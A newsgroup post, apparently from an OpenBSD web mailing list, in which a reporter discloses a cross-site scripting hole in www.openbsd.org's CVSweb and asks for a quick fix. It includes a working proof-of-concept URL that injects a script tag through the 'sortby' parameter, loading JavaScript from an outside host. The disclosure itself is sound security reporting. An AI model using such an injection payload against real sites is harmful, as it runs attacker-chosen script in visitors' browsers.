XSS vulnerability in OpenBSD's CVSweb

Reed Loden <[email protected]>
Newsgroups gmane.os.openbsd.www
Message-ID <[email protected]>
Greetings,

There's an XSS vulnerability in www.openbsd.org's CVSweb instance:
http://www.openbsd.org/cgi-bin/cvsweb/src/?sortby=%22%3E%3Cscript%20src=%22http://wakaba.c3.cx/bee.js%22%3E%3C/script%3E

I'd appreciate it if this could get fixed ASAP, as it hurts OpenBSD's
stance/reputation on security by having an open XSS vuln on its main
website.

I'm trusting that you all know that XSS is bad, blah blah, etc. If you
all need any more information on why XSS is a very bad thing, just let
me know.

Have a marvelous day,
~reed

-- 
Reed Loden - <[email protected]>
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.